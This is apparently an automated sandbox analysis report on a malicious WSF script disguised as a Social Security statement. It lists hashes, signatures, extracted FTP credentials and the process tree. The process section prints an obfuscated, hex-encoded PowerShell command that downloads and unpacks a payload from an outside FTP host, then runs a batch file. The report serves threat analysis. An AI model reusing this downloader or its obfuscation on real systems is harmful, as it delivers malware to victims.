Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
07-08-2024 13:30
Static task
static1
Behavioral task
behavioral1
Sample
Your_New_Social_Security_Statement.wsf
Resource
win7-20240705-en
windows7-x64
5 signatures
150 seconds
General
-
Target
Your_New_Social_Security_Statement.wsf
-
Size
5KB
-
MD5
3b566e8ed4838f476d7dda08a9acc1b1
-
SHA1
a426b95ac0992dda56fa15c52a2765101df19aee
-
SHA256
fd7d4ec1d86c01b1f234b333941e7615fae1dd342fb2ec80a4e78a5cc5fb5a42
-
SHA512
96a460d11d28f1f3ad545b646e1b015264cd4a86aa017a6c015a52a09d5638c09439668fb397427cd24d67de062c712010f24fc82bf9b18555c9d19f2b3e5f68
-
SSDEEP
96:TkWXrHfYiu03P/hyUMl2N6SmxV3xzjpeX0T2MNdP+lHjfmMmpR0RQVWN:o0rTuI3HM06SifzjpeEjdwQoN
Score
10/10
Malware Config
Extracted
Credentials
Protocol: ftp- Host:
142.44.252.6 - Port:
21 - Username:
dp - Password:
pp...123456
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 4 2540 powershell.exe 5 2540 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2540 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2540 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2088 wrote to memory of 2540 2088 WScript.exe 30 PID 2088 wrote to memory of 2540 2088 WScript.exe 30 PID 2088 wrote to memory of 2540 2088 WScript.exe 30 PID 2088 wrote to memory of 2900 2088 WScript.exe 33 PID 2088 wrote to memory of 2900 2088 WScript.exe 33 PID 2088 wrote to memory of 2900 2088 WScript.exe 33
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Your_New_Social_Security_Statement.wsf"1⤵
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (( 24,77,65,62 , 43,'6c' ,69 , 65, '6e' , 74 ,20, '3d' , 20,'4e', 65 , 77 ,'2d' , '4f',62 , '6a' ,65 ,63 , 74 , 20 ,53, 79,73 ,74,65 ,'6d','2e' ,'4e' , 65 , 74, '2e' ,57, 65 , 62 ,43 , '6c', 69 ,65 , '6e' ,74 ,'3b', 20 , 24 , 77 , 65, 62,43, '6c' ,69 ,65,'6e', 74, '2e', 43 , 72 , 65 , 64 ,65, '6e', 74,69, 61,'6c' , 73, 20 ,'3d',20 , '4e' ,65,77 ,'2d', '4f' ,62, '6a' , 65 ,63, 74, 20, 53, 79,73, 74 , 65 , '6d', '2e', '4e' ,65, 74 , '2e' , '4e' , 65,74 , 77, '6f' , 72 ,'6b',43,72 ,65, 64, 65 , '6e' , 74, 69, 61, '6c',28 , 27,64, 70, 27,'2c' ,20 , 27 , 70 , 70 ,'2e', '2e' , '2e' , 31, 32, 33 ,34 , 35,36 , 27 , 29 , '3b' , 20 , 24, 77 , 65 ,62,43, '6c',69,65, '6e' ,74, '2e' , 44, '6f' ,77 ,'6e', '6c', '6f',61,64,46 , 69,'6c', 65 ,28 , 27, 66 , 74 ,70, '3a', '2f' , '2f' , 31, 34 , 32 ,'2e', 34 , 34 ,'2e', 32 , 35,32,'2e' ,36, '3a',32, 31, '2f',76 ,'2e' , '6d',70 ,34,27 ,'2c',20 , 27 ,43, '3a' , '5c',50,72 ,'6f' ,67,72, 61 ,'6d' ,44 ,61 ,74,61, '5c', '6d' ,'6f', '6f' ,'6e' , '2e', '7a',69, 70,27 ,29 , '3b', 20 ,45, 78,70,61,'6e' ,64, '2d',41,72 ,63,68 ,69,76 ,65, 20,'2d',50 , 61 ,74, 68, 20 ,27 ,43, '3a' , '5c',50, 72,'6f',67 , 72, 61 , '6d',44,61,74 ,61 , '5c','6d' ,'6f','6f','6e','2e', '7a' ,69 ,70,27,20, '2d' ,44 ,65, 73 , 74, 69, '6e', 61 , 74,69, '6f','6e',50,61, 74, 68, 20, 27 , 43 ,'3a' ,'5c' , 50, 72,'6f',67, 72 , 61 , '6d',44 ,61 , 74 , 61,'5c' ,27, '3b' , 20 , 52, 65 ,'6d' ,'6f' ,76,65 ,'2d' ,49,74,65,'6d',20 ,'2d' ,50 , 61, 74,68, 20 , 27 ,43 , '3a','5c', 50 ,72, '6f' , 67 , 72,61,'6d' ,44,61 ,74 ,61, '5c','6d' , '6f' , '6f', '6e', '2e','7a' ,69 ,70, 27,20,'2d', 46,'6f',72, 63,65 )|fOreACH-ObJECt{( [cHar] ( [cONVeRT]::TOiNT16( ( $_.TOstRIng()) ,16))) })-jOiN '' |. ( $PshOME[21]+$PsHOME[34]+'X')2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2540
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\Music\3DLight.bat2⤵PID:2900
-